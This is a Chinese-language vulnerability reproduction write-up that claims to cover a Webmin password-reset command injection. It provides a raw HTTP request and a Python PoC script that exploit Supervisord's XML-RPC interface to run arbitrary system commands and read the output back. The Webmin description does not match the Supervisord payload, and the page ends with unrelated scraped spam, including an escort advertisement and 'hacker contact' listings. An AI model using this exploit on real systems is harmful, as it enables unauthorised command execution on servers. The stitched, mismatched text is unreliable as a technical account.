Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。
启动环境后访问,忽略证书后即可看到登录页面。
需要注意,必须开启“用户更改密码”,这里环境已经开启了,如果没有开启需要手动开启:
首先进入容器,修改root密码:
修改后登录webmin后修改配置:
在中查看则说明修改成功。
接下来开始复现,发送如下数据包,即可执行id命令:
POST /password_change.cgi HTTP/1.1 Host: [ip]:10000 Accept-Encoding: gzip, deflate Accept: ** Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 213 <?xml version="1.0"?> <methodCall> <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName> <params> <param> <string>touch /tmp/success</string> </param> </params> </methodCall>
查看命令执行情况:
可以看到命令成功执行。
这里还有大佬的另一个思路,将执行的结果写入log文件,然后调用Supervisord自带的readLog *** 读取log文件,将结果读出来。
poc脚本:
#!/usr/bin/env python3 import xmlrpc.client import sys target=sys.argv[1] command=sys.argv[2] with xmlrpc.client.ServerProxy(target) as proxy: old=getattr(proxy, 'supervisor.readLog')(0,0) logfile=getattr(proxy, 'supervisor.supervisord.options.logfile.strip')() getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')('{} | tee -a {}'.format(command, logfile)) result=getattr(proxy, 'supervisor.readLog')(0,0) print(result[len(old):])
执行poc脚本,输入命令::
可以看到成功执行命令,并且看到了回显。
我国 只需方针体系运转有浏览器,翻开网页将会经过AJAX或动态脚本结构(script/iframes)发生各种恳求,而因为体系网络流量被彻底绑架,履行的参数如下:│ ├── codetableModu...
“杭州旅游伴游-【戚小丽】” 职业:私房模特4:去高端夜场、商务KTV,极品会所询问外围模特。了解这些经验可以使您更快的预约到经纪人 1:请您确定了经纪人的真实性再进行交易,但一旦交易开始就不要再有任...
支付宝蚂蚁庄园4月26日小课堂的问题是,刷火锅的黄喉,其实是猪牛的哪一个器官,这里的黄喉具体指什么器官呢,我们来一起了解下具体的介绍吧。 刷火锅的黄喉,其实是猪牛的哪一个器官? 正确答案:大血...
我跟你讲个简单的道理哦!你自己的微信号,换部手机登入,经常还要验证一下对吧,然后进去了,有没有聊天记录?顶多就是最后聊天的那几句话有,有时候。 只需要下一个数据恢复工具到电脑上就可以开始恢复了:首先,...
新闻黑客怎么找相关问题 黑客分为几个等级相关问题 如何成为一名实力黑客 快手黑客联系方式(快手黑客) 怎么查看黑...
10月29日,深圳市第六届人大常委会第四十五次会议表决通过《深圳经济特区健康条例》,提出推行强制休假制度,以更好地保障劳动者身心健康。作为国内首部地方性健康法规,该条例将于明年1月1日正式实施。不...